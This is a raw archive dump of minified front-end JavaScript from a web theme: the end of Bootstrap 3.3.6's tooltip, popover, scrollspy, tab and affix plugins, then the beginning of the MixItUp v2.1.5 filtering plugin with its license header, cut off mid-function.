h="hover"==g?"mouseenter":"focusin",i="hover"==g?"mouseleave":"focusout";this.$element.on(h+"."+this.type,this.options.selector,a.proxy(this.enter,this)),this.$element.on(i+"."+this.type,this.options.selector,a.proxy(this.leave,this))}}this.options.selector?this._options=a.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.getOptions=function(b){return b=a.extend({},this.getDefaults(),this.$element.data(),b),b.delay&&"number"==typeof b.delay&&(b.delay={show:b.delay,hide:b.delay}),b},c.prototype.getDelegateOptions=function(){var b={},c=this.getDefaults();return this._options&&a.each(this._options,function(a,d){c[a]!=d&&(b[a]=d)}),b},c.prototype.enter=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);return c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof a.Event&&(c.inState["focusin"==b.type?"focus":"hover"]=!0),c.tip().hasClass("in")||"in"==c.hoverState?void(c.hoverState="in"):(clearTimeout(c.timeout),c.hoverState="in",c.options.delay&&c.options.delay.show?void(c.timeout=setTimeout(function(){"in"==c.hoverState&&c.show()},c.options.delay.show)):c.show())},c.prototype.isInStateTrue=function(){for(var a in this.inState)if(this.inState[a])return!0;return!1},c.prototype.leave=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);return c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof a.Event&&(c.inState["focusout"==b.type?"focus":"hover"]=!1),c.isInStateTrue()?void 0:(clearTimeout(c.timeout),c.hoverState="out",c.options.delay&&c.options.delay.hide?void(c.timeout=setTimeout(function(){"out"==c.hoverState&&c.hide()},c.options.delay.hide)):c.hide())},c.prototype.show=function(){var b=a.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){this.$element.trigger(b);var d=a.contains(this.$element[0].ownerDocument.documentElement,this.$element[0]);if(b.isDefaultPrevented()||!d)return;var e=this,f=this.tip(),g=this.getUID(this.type);this.setContent(),f.attr("id",g),this.$element.attr("aria-describedby",g),this.options.animation&&f.addClass("fade");var h="function"==typeof this.options.placement?this.options.placement.call(this,f[0],this.$element[0]):this.options.placement,i=/\s?auto?\s?/i,j=i.test(h);j&&(h=h.replace(i,"")||"top"),f.detach().css({top:0,left:0,display:"block"}).addClass(h).data("bs."+this.type,this),this.options.container?f.appendTo(this.options.container):f.insertAfter(this.$element),this.$element.trigger("inserted.bs."+this.type);var k=this.getPosition(),l=f[0].offsetWidth,m=f[0].offsetHeight;if(j){var n=h,o=this.getPosition(this.$viewport);h="bottom"==h&&k.bottom+m>o.bottom?"top":"top"==h&&k.top-m<o.top?"bottom":"right"==h&&k.right+l>o.width?"left":"left"==h&&k.left-l<o.left?"right":h,f.removeClass(n).addClass(h)}var p=this.getCalculatedOffset(h,k,l,m);this.applyPlacement(p,h);var q=function(){var a=e.hoverState;e.$element.trigger("shown.bs."+e.type),e.hoverState=null,"out"==a&&e.leave(e)};a.support.transition&&this.$tip.hasClass("fade")?f.one("bsTransitionEnd",q).emulateTransitionEnd(c.TRANSITION_DURATION):q()}},c.prototype.applyPlacement=function(b,c){var d=this.tip(),e=d[0].offsetWidth,f=d[0].offsetHeight,g=parseInt(d.css("margin-top"),10),h=parseInt(d.css("margin-left"),10);isNaN(g)&&(g=0),isNaN(h)&&(h=0),b.top+=g,b.left+=h,a.offset.setOffset(d[0],a.extend({using:function(a){d.css({top:Math.round(a.top),left:Math.round(a.left)})}},b),0),d.addClass("in");var i=d[0].offsetWidth,j=d[0].offsetHeight;"top"==c&&j!=f&&(b.top=b.top+f-j);var k=this.getViewportAdjustedDelta(c,b,i,j);k.left?b.left+=k.left:b.top+=k.top;var l=/top|bottom/.test(c),m=l?2*k.left-e+i:2*k.top-f+j,n=l?"offsetWidth":"offsetHeight";d.offset(b),this.replaceArrow(m,d[0][n],l)},c.prototype.replaceArrow=function(a,b,c){this.arrow().css(c?"left":"top",50*(1-a/b)+"%").css(c?"top":"left","")},c.prototype.setContent=function(){var a=this.tip(),b=this.getTitle();a.find(".tooltip-inner")[this.options.html?"html":"text"](b),a.removeClass("fade in top bottom left right")},c.prototype.hide=function(b){function d(){"in"!=e.hoverState&&f.detach(),e.$element.removeAttr("aria-describedby").trigger("hidden.bs."+e.type),b&&b()}var e=this,f=a(this.$tip),g=a.Event("hide.bs."+this.type);return this.$element.trigger(g),g.isDefaultPrevented()?void 0:(f.removeClass("in"),a.support.transition&&f.hasClass("fade")?f.one("bsTransitionEnd",d).emulateTransitionEnd(c.TRANSITION_DURATION):d(),this.hoverState=null,this)},c.prototype.fixTitle=function(){var a=this.$element;(a.attr("title")||"string"!=typeof a.attr("data-original-title"))&&a.attr("data-original-title",a.attr("title")||"").attr("title","")},c.prototype.hasContent=function(){return this.getTitle()},c.prototype.getPosition=function(b){b=b||this.$element;var c=b[0],d="BODY"==c.tagName,e=c.getBoundingClientRect();null==e.width&&(e=a.extend({},e,{width:e.right-e.left,height:e.bottom-e.top}));var f=d?{top:0,left:0}:b.offset(),g={scroll:d?document.documentElement.scrollTop||document.body.scrollTop:b.scrollTop()},h=d?{width:a(window).width(),height:a(window).height()}:null;return a.extend({},e,g,h,f)},c.prototype.getCalculatedOffset=function(a,b,c,d){return"bottom"==a?{top:b.top+b.height,left:b.left+b.width/2-c/2}:"top"==a?{top:b.top-d,left:b.left+b.width/2-c/2}:"left"==a?{top:b.top+b.height/2-d/2,left:b.left-c}:{top:b.top+b.height/2-d/2,left:b.left+b.width}},c.prototype.getViewportAdjustedDelta=function(a,b,c,d){var e={top:0,left:0};if(!this.$viewport)return e;var f=this.options.viewport&&this.options.viewport.padding||0,g=this.getPosition(this.$viewport);if(/right|left/.test(a)){var h=b.top-f-g.scroll,i=b.top+f-g.scroll+d;h<g.top?e.top=g.top-h:i>g.top+g.height&&(e.top=g.top+g.height-i)}else{var j=b.left-f,k=b.left+f+c;j<g.left?e.left=g.left-j:k>g.right&&(e.left=g.left+g.width-k)}return e},c.prototype.getTitle=function(){var a,b=this.$element,c=this.options;return a=b.attr("data-original-title")||("function"==typeof c.title?c.title.call(b[0]):c.title)},c.prototype.getUID=function(a){do a+=~~(1e6*Math.random());while(document.getElementById(a));return a},c.prototype.tip=function(){if(!this.$tip&&(this.$tip=a(this.options.template),1!=this.$tip.length))throw new Error(this.type+" `template` option must consist of exactly 1 top-level element!");return this.$tip},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow")},c.prototype.enable=function(){this.enabled=!0},c.prototype.disable=function(){this.enabled=!1},c.prototype.toggleEnabled=function(){this.enabled=!this.enabled},c.prototype.toggle=function(b){var c=this;b&&(c=a(b.currentTarget).data("bs."+this.type),c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c))),b?(c.inState.click=!c.inState.click,c.isInStateTrue()?c.enter(c):c.leave(c)):c.tip().hasClass("in")?c.leave(c):c.enter(c)},c.prototype.destroy=function(){var a=this;clearTimeout(this.timeout),this.hide(function(){a.$element.off("."+a.type).removeData("bs."+a.type),a.$tip&&a.$tip.detach(),a.$tip=null,a.$arrow=null,a.$viewport=null})};var d=a.fn.tooltip;a.fn.tooltip=b,a.fn.tooltip.Constructor=c,a.fn.tooltip.noConflict=function(){return a.fn.tooltip=d,this}}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.popover"),f="object"==typeof b&&b;(e||!/destroy|hide/.test(b))&&(e||d.data("bs.popover",e=new c(this,f)),"string"==typeof b&&e[b]())})}var c=function(a,b){this.init("popover",a,b)};if(!a.fn.tooltip)throw new Error("Popover requires tooltip.js");c.VERSION="3.3.6",c.DEFAULTS=a.extend({},a.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:'<div class="popover" role="tooltip"><div class="arrow"></div><h3 class="popover-title"></h3><div class="popover-content"></div></div>'}),c.prototype=a.extend({},a.fn.tooltip.Constructor.prototype),c.prototype.constructor=c,c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.setContent=function(){var a=this.tip(),b=this.getTitle(),c=this.getContent();a.find(".popover-title")[this.options.html?"html":"text"](b),a.find(".popover-content").children().detach().end()[this.options.html?"string"==typeof c?"html":"append":"text"](c),a.removeClass("fade top bottom left right in"),a.find(".popover-title").html()||a.find(".popover-title").hide()},c.prototype.hasContent=function(){return this.getTitle()||this.getContent()},c.prototype.getContent=function(){var a=this.$element,b=this.options;return a.attr("data-content")||("function"==typeof b.content?b.content.call(a[0]):b.content)},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".arrow")};var d=a.fn.popover;a.fn.popover=b,a.fn.popover.Constructor=c,a.fn.popover.noConflict=function(){return a.fn.popover=d,this}}(jQuery),+function(a){"use strict";function b(c,d){this.$body=a(document.body),this.$scrollElement=a(a(c).is(document.body)?window:c),this.options=a.extend({},b.DEFAULTS,d),this.selector=(this.options.target||"")+" .nav li > a",this.offsets=[],this.targets=[],this.activeTarget=null,this.scrollHeight=0,this.$scrollElement.on("scroll.bs.scrollspy",a.proxy(this.process,this)),this.refresh(),this.process()}function c(c){return this.each(function(){var d=a(this),e=d.data("bs.scrollspy"),f="object"==typeof c&&c;e||d.data("bs.scrollspy",e=new b(this,f)),"string"==typeof c&&e[c]()})}b.VERSION="3.3.6",b.DEFAULTS={offset:10},b.prototype.getScrollHeight=function(){return this.$scrollElement[0].scrollHeight||Math.max(this.$body[0].scrollHeight,document.documentElement.scrollHeight)},b.prototype.refresh=function(){var b=this,c="offset",d=0;this.offsets=[],this.targets=[],this.scrollHeight=this.getScrollHeight(),a.isWindow(this.$scrollElement[0])||(c="position",d=this.$scrollElement.scrollTop()),this.$body.find(this.selector).map(function(){var b=a(this),e=b.data("target")||b.attr("href"),f=/^#./.test(e)&&a(e);return f&&f.length&&f.is(":visible")&&[[f[c]().top+d,e]]||null}).sort(function(a,b){return a[0]-b[0]}).each(function(){b.offsets.push(this[0]),b.targets.push(this[1])})},b.prototype.process=function(){var a,b=this.$scrollElement.scrollTop()+this.options.offset,c=this.getScrollHeight(),d=this.options.offset+c-this.$scrollElement.height(),e=this.offsets,f=this.targets,g=this.activeTarget;if(this.scrollHeight!=c&&this.refresh(),b>=d)return g!=(a=f[f.length-1])&&this.activate(a);if(g&&b<e[0])return this.activeTarget=null,this.clear();for(a=e.length;a--;)g!=f[a]&&b>=e[a]&&(void 0===e[a+1]||b<e[a+1])&&this.activate(f[a])},b.prototype.activate=function(b){this.activeTarget=b,this.clear();var c=this.selector+'[data-target="'+b+'"],'+this.selector+'[href="'+b+'"]',d=a(c).parents("li").addClass("active");
d.parent(".dropdown-menu").length&&(d=d.closest("li.dropdown").addClass("active")),d.trigger("activate.bs.scrollspy")},b.prototype.clear=function(){a(this.selector).parentsUntil(this.options.target,".active").removeClass("active")};var d=a.fn.scrollspy;a.fn.scrollspy=c,a.fn.scrollspy.Constructor=b,a.fn.scrollspy.noConflict=function(){return a.fn.scrollspy=d,this},a(window).on("load.bs.scrollspy.data-api",function(){a('[data-spy="scroll"]').each(function(){var b=a(this);c.call(b,b.data())})})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.tab");e||d.data("bs.tab",e=new c(this)),"string"==typeof b&&e[b]()})}var c=function(b){this.element=a(b)};c.VERSION="3.3.6",c.TRANSITION_DURATION=150,c.prototype.show=function(){var b=this.element,c=b.closest("ul:not(.dropdown-menu)"),d=b.data("target");if(d||(d=b.attr("href"),d=d&&d.replace(/.*(?=#[^\s]*$)/,"")),!b.parent("li").hasClass("active")){var e=c.find(".active:last a"),f=a.Event("hide.bs.tab",{relatedTarget:b[0]}),g=a.Event("show.bs.tab",{relatedTarget:e[0]});if(e.trigger(f),b.trigger(g),!g.isDefaultPrevented()&&!f.isDefaultPrevented()){var h=a(d);this.activate(b.closest("li"),c),this.activate(h,h.parent(),function(){e.trigger({type:"hidden.bs.tab",relatedTarget:b[0]}),b.trigger({type:"shown.bs.tab",relatedTarget:e[0]})})}}},c.prototype.activate=function(b,d,e){function f(){g.removeClass("active").find("> .dropdown-menu > .active").removeClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!1),b.addClass("active").find('[data-toggle="tab"]').attr("aria-expanded",!0),h?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu").length&&b.closest("li.dropdown").addClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!0),e&&e()}var g=d.find("> .active"),h=e&&a.support.transition&&(g.length&&g.hasClass("fade")||!!d.find("> .fade").length);g.length&&h?g.one("bsTransitionEnd",f).emulateTransitionEnd(c.TRANSITION_DURATION):f(),g.removeClass("in")};var d=a.fn.tab;a.fn.tab=b,a.fn.tab.Constructor=c,a.fn.tab.noConflict=function(){return a.fn.tab=d,this};var e=function(c){c.preventDefault(),b.call(a(this),"show")};a(document).on("click.bs.tab.data-api",'[data-toggle="tab"]',e).on("click.bs.tab.data-api",'[data-toggle="pill"]',e)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.affix"),f="object"==typeof b&&b;e||d.data("bs.affix",e=new c(this,f)),"string"==typeof b&&e[b]()})}var c=function(b,d){this.options=a.extend({},c.DEFAULTS,d),this.$target=a(this.options.target).on("scroll.bs.affix.data-api",a.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",a.proxy(this.checkPositionWithEventLoop,this)),this.$element=a(b),this.affixed=null,this.unpin=null,this.pinnedOffset=null,this.checkPosition()};c.VERSION="3.3.6",c.RESET="affix affix-top affix-bottom",c.DEFAULTS={offset:0,target:window},c.prototype.getState=function(a,b,c,d){var e=this.$target.scrollTop(),f=this.$element.offset(),g=this.$target.height();if(null!=c&&"top"==this.affixed)return c>e?"top":!1;if("bottom"==this.affixed)return null!=c?e+this.unpin<=f.top?!1:"bottom":a-d>=e+g?!1:"bottom";var h=null==this.affixed,i=h?e:f.top,j=h?g:b;return null!=c&&c>=e?"top":null!=d&&i+j>=a-d?"bottom":!1},c.prototype.getPinnedOffset=function(){if(this.pinnedOffset)return this.pinnedOffset;this.$element.removeClass(c.RESET).addClass("affix");var a=this.$target.scrollTop(),b=this.$element.offset();return this.pinnedOffset=b.top-a},c.prototype.checkPositionWithEventLoop=function(){setTimeout(a.proxy(this.checkPosition,this),1)},c.prototype.checkPosition=function(){if(this.$element.is(":visible")){var b=this.$element.height(),d=this.options.offset,e=d.top,f=d.bottom,g=Math.max(a(document).height(),a(document.body).height());"object"!=typeof d&&(f=e=d),"function"==typeof e&&(e=d.top(this.$element)),"function"==typeof f&&(f=d.bottom(this.$element));var h=this.getState(g,b,e,f);if(this.affixed!=h){null!=this.unpin&&this.$element.css("top","");var i="affix"+(h?"-"+h:""),j=a.Event(i+".bs.affix");if(this.$element.trigger(j),j.isDefaultPrevented())return;this.affixed=h,this.unpin="bottom"==h?this.getPinnedOffset():null,this.$element.removeClass(c.RESET).addClass(i).trigger(i.replace("affix","affixed")+".bs.affix")}"bottom"==h&&this.$element.offset({top:g-b-f})}};var d=a.fn.affix;a.fn.affix=b,a.fn.affix.Constructor=c,a.fn.affix.noConflict=function(){return a.fn.affix=d,this},a(window).on("load",function(){a('[data-spy="affix"]').each(function(){var c=a(this),d=c.data();d.offset=d.offset||{},null!=d.offsetBottom&&(d.offset.bottom=d.offsetBottom),null!=d.offsetTop&&(d.offset.top=d.offsetTop),b.call(c,d)})})}(jQuery);PK!&��R�n�nbizone/js/jquery.mixitup.min.jsnu&1i�/**!
 * MixItUp v2.1.5
 *
 * @copyright Copyright 2014 KunkaLabs Limited.
 * @author    KunkaLabs Limited.
 * @link      https://mixitup.kunkalabs.com
 *
 * @license   Commercial use requires a commercial license.
 *            https://mixitup.kunkalabs.com/licenses/
 *
 *            Non-commercial use permitted under terms of CC-BY-NC license.
 *            http://creativecommons.org/licenses/by-nc/3.0/
 */
!function(a,b){a.MixItUp=function(){var b=this;b._execAction("_constructor",0),a.extend(b,{selectors:{target:".mix",filter:".filter",sort:".sort"},animation:{enable:!0,effects:"fade scale",duration:600,easing:"ease",perspectiveDistance:"3000",perspectiveOrigin:"50% 50%",queue:!0,queueLimit:1,animateChangeLayout:!1,animateResizeContainer:!0,animateResizeTargets:!1,staggerSequence:!1,reverseOut:!1},callbacks:{onMixLoad:!1,onMixStart:!1,onMixBusy:!1,onMixEnd:!1,onMixFail:!1,_user:!1},controls:{enable:!0,live:!1,toggleFilterButtons:!1,toggleLogic:"or",activeClass:"active"},layout:{display:"inline-block",containerClass:"",containerClassFail:"fail"},load:{filter:"all",sort:!1},_$body:null,_$container:null,_$targets:null,_$parent:null,_$sortButtons:null,_$filterButtons:null,_suckMode:!1,_mixing:!1,_sorting:!1,_clicking:!1,_loading:!0,_changingLayout:!1,_changingClass:!1,_changingDisplay:!1,_origOrder:[],_startOrder:[],_newOrder:[],_activeFilter:null,_toggleArray:[],_toggleString:"",_activeSort:"default:asc",_newSort:null,_startHeight:null,_newHeight:null,_incPadding:!0,_newDisplay:null,_newClass:null,_targetsBound:0,_targetsDone:0,_queue:[],_$show:a(),_$hide:a()}),b._execAction("_constructor",1)},a.MixItUp.prototype={constructor:a.MixItUp,_instances:{},_handled:{_filter:{},_sort:{}},_bound:{_filter:{},_sort:{}},_actions:{},_filters:{},extend:function(b){for(var c in b)a.MixItUp.prototype[c]=b[c]},addAction:function(b,c,d,e){a.MixItUp.prototype._addHook("_actions",b,c,d,e)},addFilter:function(b,c,d,e){a.MixItUp.prototype._addHook("_filters",b,c,d,e)},_addHook:function(b,c,d,e,f){var g=a.MixItUp.prototype[b],h={};f=1===f||"post"===f?"post":"pre",h[c]={},h[c][f]={},h[c][f][d]=e,a.extend(!0,g,h)},_init:function(b,c){var d=this;if(d._execAction("_init",0,arguments),c&&a.extend(!0,d,c),d._$body=a("body"),d._domNode=b,d._$container=a(b),d._$container.addClass(d.layout.containerClass),d._id=b.id,d._platformDetect(),d._brake=d._getPrefixedCSS("transition","none"),d._refresh(!0),d._$parent=d._$targets.parent().length?d._$targets.parent():d._$container,d.load.sort&&(d._newSort=d._parseSort(d.load.sort),d._newSortString=d.load.sort,d._activeSort=d.load.sort,d._sort(),d._printSort()),d._activeFilter="all"===d.load.filter?d.selectors.target:"none"===d.load.filter?"":d.load.filter,d.controls.enable&&d._bindHandlers(),d.controls.toggleFilterButtons){d._buildToggleArray();for(var e=0;e<d._toggleArray.length;e++)d._updateControls({filter:d._toggleArray[e],sort:d._activeSort},!0)}else d.controls.enable&&d._updateControls({filter:d._activeFilter,sort:d._activeSort});d._filter(),d._init=!0,d._$container.data("mixItUp",d),d._execAction("_init",1,arguments),d._buildState(),d._$targets.css(d._brake),d._goMix(d.animation.enable)},_platformDetect:function(){var a=this,c=["Webkit","Moz","O","ms"],d=["webkit","moz"],e=window.navigator.appVersion.match(/Chrome\/(\d+)\./)||!1,f="undefined"!=typeof InstallTrigger,g=function(a){for(var b=0;b<c.length;b++)if(c[b]+"Transition"in a.style)return{prefix:"-"+c[b].toLowerCase()+"-",vendor:c[b]};return"transition"in a.style?"":!1},h=g(a._domNode);a._execAction("_platformDetect",0),a._chrome=e?parseInt(e[1],10):!1,a._ff=f?parseInt(window.navigator.userAgent.match(/rv:([^)]+)\)/)[1]):!1,a._prefix=h.prefix,a._vendor=h.vendor,a._suckMode=window.atob&&a._prefix?!1:!0,a._suckMode&&(a.animation.enable=!1),a._ff&&a._ff<=4&&(a.animation.enable=!1);for(var i=0;i<d.length&&!window.requestAnimationFrame;i++)window.requestAnimationFrame=window[d[i]+"RequestAnimationFrame"];"function"!=typeof Object.getPrototypeOf&&(Object.getPrototypeOf="object"==typeof"test".__proto__?function(a){return a.__proto__}:function(a){return a.constructor.prototype}),a._domNode.nextElementSibling===b&&Object.defineProperty(Element.prototype,"nextElementSibling",{get:function(){for(var a=this.nextSibling;a;){if(1===a.nodeType)return a;a=a.nextSibling}return null}}),a._execAction("_platformDetect",1)},_refresh:function(a,c){var d=this;d._execAction("_refresh",0,arguments),d._$targets=d._$container.find(d.selectors.target);for(var e=0;e<d._$targets.length;e++){var f=d._$targets[e];if(f.dataset===b||c){f.dataset={};for(var g=0;g<f.attributes.length;g++){var h=f.attributes[g],i=h.name,j=h.nodeValue;if(i.indexOf("data-")>-1){var k=d._helpers._camelCase(i.substring(5,i.length));f.dataset[k]=j}}}f.mixParent===b&&(f.mixParent=d._id)}if(d._$targets.length&&a||!d._origOrder.length&&d._$targets.length){d._origOrder=[];for(var e=0;e<d._$targets.length;e++){var f=d._$targets[e];d._origOrder.push(f)}}d._execAction("_refresh",1,arguments)},_bindHandlers:function(){var c=this,d=a.MixItUp.prototype._bound._filter,e=a.MixItUp.prototype._bound._sort;c._execAction("_bindHandlers",0),c.controls.live?c._$body.on("click.mixItUp."+c._id,c.selectors.sort,function(){c._processClick(a(this),"sort")}).on("click.mixItUp."+c._id,c.selectors.filter,function(){c._processClick(a(this),"filter")}):(c._$sortButtons=a(c.selectors.sort),c._$filterButtons=a(c.selectors.filter),c._$sortButtons.on("click.mixItUp."+c._id,function(){c._processClick(a(this),"sort")}),c._$filterButtons.on("click.mixItUp."+c._id,function(){c._processClick(a(this),"filter")})),d[c.selectors.filter]=d[c.selectors.filter]===b?1:d[c.selectors.filter]+1,e[c.selectors.sort]=e[c.selectors.sort]===b?1:e[c.selectors.sort]+1,c._execAction("_bindHandlers",1)},_processClick:function(c,d){var e=this,f=function(c,d,f){var g=a.MixItUp.prototype;g._handled["_"+d][e.selectors[d]]=g._handled["_"+d][e.selectors[d]]===b?1:g._handled["_"+d][e.selectors[d]]+1,g._handled["_"+d][e.selectors[d]]===g._bound["_"+d][e.selectors[d]]&&(c[(f?"remove":"add")+"Class"](e.controls.activeClass),delete g._handled["_"+d][e.selectors[d]])};if(e._execAction("_processClick",0,arguments),!e._mixing||e.animation.queue&&e._queue.length<e.animation.queueLimit){if(e._clicking=!0,"sort"===d){var g=c.attr("data-sort");(!c.hasClass(e.controls.activeClass)||g.indexOf("random")>-1)&&(a(e.selectors.sort).removeClass(e.controls.activeClass),f(c,d),e.sort(g))}if("filter"===d){var h,i=c.attr("data-filter"),j="or"===e.controls.toggleLogic?",":"";e.controls.toggleFilterButtons?(e._buildToggleArray(),c.hasClass(e.controls.activeClass)?(f(c,d,!0),h=e._toggleArray.indexOf(i),e._toggleArray.splice(h,1)):(f(c,d),e._toggleArray.push(i)),e._toggleArray=a.grep(e._toggleArray,function(a){return a}),e._toggleString=e._toggleArray.join(j),e.filter(e._toggleString)):c.hasClass(e.controls.activeClass)||(a(e.selectors.filter).removeClass(e.controls.activeClass),f(c,d),e.filter(i))}e._execAction("_processClick",1,arguments)}else"function"==typeof e.callbacks.onMixBusy&&e.callbacks.onMixBusy.call(e._domNode,e._state,e),e._execAction("_processClickBusy",1,arguments)},_buildToggleArray:function(){var a=this,b=a._activeFilter.replace(/\s/g,"");if(a._execAction("_buildToggleArray",0,arguments),"or"===a.controls.toggleLogic)a._toggleArray=b.split(",");else{a._toggleArray=b.split("."),!a._toggleArray[0]&&a._toggleArray.shift();for(var c,d=0;c=a._toggleArray[d];d++)a._toggleArray[d]="."+c}a._execAction("_buildToggleArray",1,arguments)},_updateControls:function(c,d){var e=this,f={filter:c.filter,sort:c.sort},g=function(a,b){d&&"filter"==h&&"none"!==f.filter&&""!==f.filter?a.filter(b).addClass(e.controls.activeClass):a.removeClass(e.controls.activeClass).filter(b).addClass(e.controls.activeClass)},h="filter",i=null;e._execAction("_updateControls",0,arguments),c.filter===b&&(f.filter=e._activeFilter),c.sort===b&&(f.sort=e._activeSort),f.filter===e.selectors.target&&(f.filter="all");for(var j=0;2>j;j++)i=e.controls.live?a(e.selectors[h]):e["_$"+h+"Buttons"],i&&g(i,"[data-"+h+'="'+f[h]+'"]'),h="sort";e._execAction("_updateControls",1,arguments)},_filter:function(){var b=this;b._execAction("_filter",0);for(var c=0;c<b._$targets.length;c++){var d=a(b._$targets[c]);d.is(b._activeFilter)?b._$show=b._$show.add(d):b._$hide=b._$hide.add(d)}b._execAction("_filter",1)},_sort:function(){var a=this,b=function(a){for(var b=a.slice(),c=b.length,d=c;d--;){var e=parseInt(Math.random()*c),f=b[d];b[d]=b[e],b[e]=f}return b};a._execAction("_sort",0),a._startOrder=[];for(var c=0;c<a._$targets.length;c++){var d=a._$targets[c];a._startOrder.push(d)}switch(a._newSort[0].sortBy){case"default":a._newOrder=a._origOrder;break;case"random":a._newOrder=b(a._startOrder);break;case"custom":a._newOrder=a._newSort[0].order;break;default:a._newOrder=a._startOrder.concat().sort(function(b,c){return a._compare(b,c)})}a._execAction("_sort",1)},_compare:function(a,b,c){c=c?c:0;var d=this,e=d._newSort[c].order,f=function(a){return a.dataset[d._newSort[c].sortBy]||0},g=isNaN(1*f(a))?f(a).toLowerCase():1*f(a),h=isNaN(1*f(b))?f(b).toLowerCase():1*f(b);return h>g?"asc"==e?-1:1:g>h?"asc"==e?1:-1:g==h&&d._newSort.length>c+1?d._compare(a,b,c+1):0},_printSort:function(a){var b=this,c=a?b._startOrder:b._newOrder,d=b._$parent[0].querySelectorAll(b.selectors.target),e=d[d.length-1].nextElementSibling,f=document.createDocumentFragment();b._execAction("_printSort",0,arguments);for(var g=0;g<d.length;g++){var h=d[g],i=h.nextSibling;"absolute"!==h.style.position&&(i&&"#text"==i.nodeName&&b._$parent[0].removeChild(i),b._$parent[0].removeChild(h))}for(var g=0;g<c.length;g++){var j=c[g];if("default"!=b._newSort[0].sortBy||"desc"!=b._newSort[0].order||a)f.appendChild(j),f.appendChild(document.createTextNode(" "));else{var k=f.firstChild;f.insertBefore(j,k),f.insertBefore(document.createTextNode(" "),j)}}e?b._$parent[0].insertBefore(f,e):b._$parent[0].appendChild(f),b._execAction("_printSort",1,arguments)},_parseSort:function(a){for(var b=this,c="string"==typeof a?a.split(" "):[a],d=[],e=0;e<c.length;e++){var f="string"==typeof a?c[e].split(":"):["custom",c[e]],g={sortBy:b._helpers._camelCase(f[0]),order:f[1]||"asc"};if(d.push(g),"default"==g.sortBy||"random"==g.sortBy)break}return b._execFilter("_parseSort",d,arguments)},_parseEffects:function(){var a=this,b={opacity:"",transformIn:"",transformOut:"",filter:""},c=function(b,c){if(a.animation.effects.indexOf(b)>-1){if(c){var d=a.animation.effects.indexOf(b+"(");if(d>-1){var e=a.animation.effects.substring(d),f=/\(([^)]+)\)/.exec(e),g=f[1];return{val:g}}}return!0}return!1},d=function(a,b){return b?"-"===a.charAt(0)?a.substr(1,a.length):"-"+a:a},e=function(a,e){for(var f=[["scale",".01"],["translateX","20px"],["translateY","20px"],["translateZ","20px"],["rotateX","90deg"],["rotateY","90deg"],["rotateZ","180deg"]],g=0;g<f.length;g++){var h=f[g][0],i=f[g][1],j=e&&"scale"!==h;b[a]+=c(h)?h+"("+d(c(h,!0).val||i,j)+") ":""}};return b.opacity=c("fade")?c("fade",!0).val||"0":"1",e("transformIn"),a.animation.reverseOut?e("transformOut",!0):b.transformOut=b.transformIn,b.transition={},b.transition=a._getPrefixedCSS("transition","all "+a.animation.duration+"ms "+a.animation.easing+", opacity "+a.animation.duration+"ms linear"),a.animation.stagger=c("stagger")?!0:!1,a.animation.staggerDuration=parseInt(c("stagger")?c("stagger",!0).val?c("stagger",!0).val:100:100),a._execFilter("_parseEffects",b)},_buildState:function(a){var b=this,c={};return b._execAction("_buildState",0),c={activeFilter:""===b._activeFilter?"none":b._activeFilter,activeSort:a&&b._newSortString?b._newSortString:b._activeSort,fail:!b._$show.length&&""!==b._activeFilter,$targets:b._$targets,$show:b._$show,$hide:b._$hide,totalTargets:b._$targets.length,totalShow:b._$show.length,totalHide:b._$hide.length,display:a&&b._newDisplay?b._newDisplay:b.layout.display},a?b._execFilter("_buildState",c):(b._state=c,b._execAction("_buildState",1),void 0)},_goMix:function(a){var b=this,c=function(){b._chrome&&31===b._chrome&&f(b._$parent[0]),b._setInter(),d()},d=function(){var a=window.pageYOffset,c=window.pageXOffset;document.documentElement.scrollHeight,b._getInterMixData(),b._setFinal(),b._getFinalMixData(),window.pageYOffset!==a&&window.scrollTo(c,a),b._prepTargets(),window.requestAnimationFrame?requestAnimationFrame(e):setTimeout(function(){e()},20)},e=function(){b._animateTargets(),0===b._targetsBound&&b._cleanUp()},f=function(a){var b=a.parentElement,c=document.createElement("div"),d=document.createDocumentFragment();b.insertBefore(c,a),d.appendChild(a),b.replaceChild(a,c)},g=b._buildState(!0);b._execAction("_goMix",0,arguments),!b.animation.duration&&(a=!1),b._mixing=!0,b._$container.removeClass(b.layout.containerClassFail),"function"==typeof b.callbacks.onMixStart&&b.callbacks.onMixStart.call(b._domNode,b._state,g,b),b._$container.trigger("mixStart",[b._state,g,b]),b._getOrigMixData(),a&&!b._suckMode?window.requestAnimationFrame?requestAnimationFrame(c):c():b._cleanUp(),b._execAction("_goMix",1,arguments)},_getTargetData:function(a,b){var c,d=this;a.dataset[b+"PosX"]=a.offsetLeft,a.dataset[b+"PosY"]=a.offsetTop,d.animation.animateResizeTargets&&(c=window.getComputedStyle(a),a.dataset[b+"MarginBottom"]=parseInt(c.marginBottom),a.dataset[b+"MarginRight"]=parseInt(c.marginRight),a.dataset[b+"Width"]=a.offsetWidth,a.dataset[b+"Height"]=a.offsetHeight)},_getOrigMixData:function(){var 